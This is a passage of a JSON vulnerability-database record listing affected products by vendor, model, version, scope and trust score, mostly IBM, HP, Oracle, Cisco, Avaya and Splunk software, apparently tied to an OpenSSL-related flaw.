            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "ctpview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.6.156"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.2.0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.10"
          },
          {
            "_id": null,
            "model": "link for mac os (build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.0.16)"
          },
          {
            "_id": null,
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.13"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.034"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.27"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.0.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "14.10"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.7"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.12"
          },
          {
            "_id": null,
            "model": "jabber for android",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise content delivery service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere application server community edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.4"
          },
          {
            "_id": null,
            "model": "unified sip proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jre update5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "tivoli system automation for integrated operations management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.0.2"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.4"
          },
          {
            "_id": null,
            "model": "app for stream",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.8"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.035"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1.6"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.1"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "adaptive security appliance software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9.1(5.106)"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.3"
          },
          {
            "_id": null,
            "model": "jdk update11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.0"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "java sdk sr3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "systems insight manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.42"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.3"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 23853 47",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "java",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.480"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.026"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3850x638370"
          },
          {
            "_id": null,
            "model": "netscaler application delivery controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.7"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.1"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.1.2"
          },
          {
            "_id": null,
            "model": "work space manager for bes10/bes12 25616 10",
            "scope": null,
            "trust": 0.3,
            "vendor": "blackberry",
            "version": null
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.3"
          },
          {
            "_id": null,
            "model": "operations analytics predictive insights",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.4"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.0"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.33"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "network node manager i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.20"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "aura messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.2"
          },
          {
            "_id": null,
            "model": "workcentre spar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "35500"
          },
          {
            "_id": null,
            "model": "os image for aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1.1.0"
          },
          {
            "_id": null,
            "model": "application policy infrastructure controller 1.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.31"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fixpack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.24"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.18"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.0.13"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "aura conferencing sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "security access manager for web",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365042550"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.9.1"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.4.0.5"
          },
          {
            "_id": null,
            "model": "communications core session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.3.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1.0-103"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.12.201"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.2"
          },
          {
            "_id": null,
            "model": "java sdk sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.040"
          },
          {
            "_id": null,
            "model": "prime collaboration deployment",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.31"
          },
          {
            "_id": null,
            "model": "dx series ip phones",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8za",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "ace30 application control engine module 3.0 a5",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "unified computing system b-series servers",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8q",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "sterling connect:express for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.0.11"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0.96"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.012"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2.127"
          },
          {
            "_id": null,
            "model": "jabber software development kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.800"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.3"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.10"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6.0.3"
          },
          {
            "_id": null,
            "model": "db2 advanced workgroup server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "bbm meetings for android",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "cms r17 r4",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "mysql server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5.6.21"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.9"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.065"
          },
          {
            "_id": null,
            "model": "cognos insight standard edition fp if",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.214"
          },
          {
            "_id": null,
            "model": "business intelligence enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.9"
          },
          {
            "_id": null,
            "model": "tivoli monitoring",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.11"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.200"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip telephony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "tivoli monitoring fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.2.305"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.5"
          },
          {
            "_id": null,
            "model": "sametime",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8g",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r17",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.3.0.10"
          },
          {
            "_id": null,
            "model": "flex system fc3171 8gb san switch and san pass-thru",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.5.03.00"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.45"
          },
          {
            "_id": null,
            "model": "integration bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1.4"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.0.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "hunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.10.2"
          },
          {
            "_id": null,
            "model": "database 12c release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "112.12"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.15"
          },
          {
            "_id": null,
            "model": "data ontap operating in 7-mode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.2"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.037"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "_id": null,
            "model": "tivoli storage manager client management services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "bbm meetings for ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.2"
          },
          {
            "_id": null,
            "model": "i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.17"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.1.7"
          },
          {
            "_id": null,
            "model": "sametime community server limited use",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9"
          },
          {
            "_id": null,
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "jdk update22",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.220"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.12"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3690x571470"
          },
          {
            "_id": null,
            "model": "snapdrive for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.2"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x24087370"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "onepk all-in-one vm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.2"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.31"
          },
          {
            "_id": null,
            "model": "content collector for sap applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "db2 developer edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.0.10"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.5"
          },
          {
            "_id": null,
            "model": "aura conferencing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.8"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "system m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365041990"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle with sap environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.1.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1.11"
          },
          {
            "_id": null,
            "model": "network node manager ispi for net",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.2"
          },
          {
            "_id": null,
            "model": "flex system manager node types",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "87340"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.041"
          },
          {
            "_id": null,
            "model": "aura system manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "domino fix pack interim f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.24"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.11"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.12"
          },
          {
            "_id": null,
            "model": "secure work space for bes10/bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.1.0.150359"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "virtual connect enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.015"
          },
          {
            "_id": null,
            "model": "ddos secure",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "ip office server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "cms r17 r3",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.180"
          },
          {
            "_id": null,
            "model": "network node manager i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "integration bus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.045"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.16"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
